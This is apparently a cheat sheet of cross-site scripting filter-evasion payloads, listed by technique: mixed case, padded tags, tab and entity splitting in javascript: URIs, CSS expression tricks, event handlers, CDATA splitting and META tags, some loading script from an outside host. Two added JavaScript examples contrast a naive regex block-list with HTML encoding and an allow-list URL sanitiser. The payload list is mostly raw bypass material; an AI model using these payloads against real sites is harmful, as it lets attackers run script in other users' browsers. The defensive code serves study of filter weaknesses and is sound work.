1. Change the character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
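’>">
Why the case and extra-character tricks in sections 1 and 2 beat a block-list, and what does hold up, as an added example that is not part of the original post: a case-sensitive regex filter of the kind these tricks are aimed at is run next to contextual HTML encoding of the same untrusted data. The payload strings are the post's own samples; the function names and the naive regex are this example's assumptions.

```javascript
// Added example, not from the original post: block-list regex vs. output encoding.

// A naive filter of the kind sections 1 and 2 are written against:
// case-sensitive, looks for one exact spelling of the opening tag.
const NAIVE_SCRIPT_RE = /<script>/;

function naiveFilterBlocks(input) {
  return NAIVE_SCRIPT_RE.test(input);
}

// Contextual encoding for the HTML text / quoted-attribute context: every
// character that can open or close a tag or attribute becomes an entity, so the
// browser cannot parse a tag out of the data whatever its casing or padding.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed sample set: four of the post's payloads plus one benign string
// that merely contains characters a block-list tends to mangle.
const SAMPLES = [
  "<sCript>alert('d')</scRipT>",            // section 1: mixed case
  "<<script>alert('c')//<</script>",        // section 2: doubled brackets
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',     // section 2: fake attribute
  '<SCRIPT/SRC="t.js"></SCRIPT>',           // section 5: slash instead of space
  "O'Reilly & Sons <3",                     // benign text, must survive intact
];

// For each sample: did the naive filter stop it, and does the encoded output
// still contain anything the HTML parser would read as a tag (it never should)?
function compare(samples = SAMPLES) {
  return samples.map((s) => ({
    sample: s,
    blockedByNaiveFilter: naiveFilterBlocks(s),
    encoded: escapeHtml(s),
    encodedStillHasTag: /<[a-zA-Z\/]/.test(escapeHtml(s)),
  }));
}

// Stand-alone run: prints one row per sample.
if (typeof require !== 'undefined' && require.main === module) {
  console.table(compare());
}
```

Only one of the four payloads (the doubled-bracket one, which still contains the literal `<script>`) trips the naive regex, while every encoded output is inert; the benign string is also preserved rather than mangled. The encoder shown is for the HTML text and quoted-attribute context only; data placed inside a JavaScript block, a URL or a CSS value needs the encoder for that context.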
3. Replace .js with another extension

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" can also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart, then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
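The defensive counterpart to sections 6, 8, 9 and 14, as an added example that is not part of the original post: a URL-attribute check that first normalises the value (strips the whitespace and control characters behind the tab/newline trick, decodes numeric entities with or without the trailing ";" noted in section 8) and then accepts only allow-listed schemes, instead of block-listing the string "javascript:", plus an attribute filter that drops every on* handler from the section 9 list. The payload samples are the post's; the helper names, the attribute-map input format and the scheme allow-list are assumptions of this example.

```javascript
// Added example, not from the original post: normalise-then-allow-list for
// URL-valued attributes, and an on* event-handler drop.

// Attributes whose value is dereferenced as a URL (from the post's section 14 samples).
const URL_ATTRIBUTES = new Set(['src', 'href', 'lowsrc', 'dynsrc', 'background']);
// Assumed allow-list: anything else, including javascript: and data:, is rejected.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Decode &#NN; / &#xHH; entities (";" optional, as section 8 notes), then strip
// ASCII control characters and whitespace, which browsers ignore inside a scheme.
function normaliseUrl(value) {
  const decoded = String(value)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
  return decoded.replace(/[\u0000-\u0020]/g, '').toLowerCase();
}

// Accept relative URLs (no scheme) and allow-listed absolute schemes only.
function urlIsAllowed(value) {
  const url = normaliseUrl(value);
  const m = /^([a-z][a-z0-9+.-]*:)/.exec(url);
  if (!m) return true;
  return ALLOWED_SCHEMES.has(m[1]);
}

// Minimal attribute filter over {name: value} pairs already parsed from a tag.
// Parsing HTML with regexes is exactly what this post defeats, so a real
// deployment hands that step to the browser's parser or a sanitiser library.
function sanitiseAttributes(attrs) {
  const kept = {};
  const dropped = [];
  for (const [rawName, value] of Object.entries(attrs)) {
    const name = rawName.toLowerCase();
    if (name.startsWith('on')) {                       // section 9 handler list
      dropped.push(rawName);
      continue;
    }
    if (URL_ATTRIBUTES.has(name) && !urlIsAllowed(value)) {
      dropped.push(rawName);
      continue;
    }
    kept[rawName] = value;
  }
  return { kept, dropped };
}

// Constructed sample tags, one attribute map each, built from the post's payloads.
const SAMPLE_TAGS = [
  { SRC: "jav\tascr\nipt:alert('XSS3')", ALT: 'tab and newline inside the scheme' },
  { src: 'jav&#x09;ascript:alert(1)' },          // entity-encoded tab
  { src: '&#106avascript:alert(1)' },            // decimal entity, no ";"
  { onload: "alert('onload')", class: 'x' },
  { DYNSRC: "javascript:alert('XSS20')" },
  { href: 'https://example.com/page', title: 'benign absolute link' },
  { href: '/relative/path' },
];

function reviewSamples(tags = SAMPLE_TAGS) {
  return tags.map(sanitiseAttributes);
}

// Stand-alone run: show what survives each sample tag.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(reviewSamples(), null, 2));
}
```

The point of normalising before matching is that the check then sees the same string the browser's URL parser will act on; a block-list applied to the raw value would have to enumerate every whitespace, entity and case variant the post lists, and would still miss the next one.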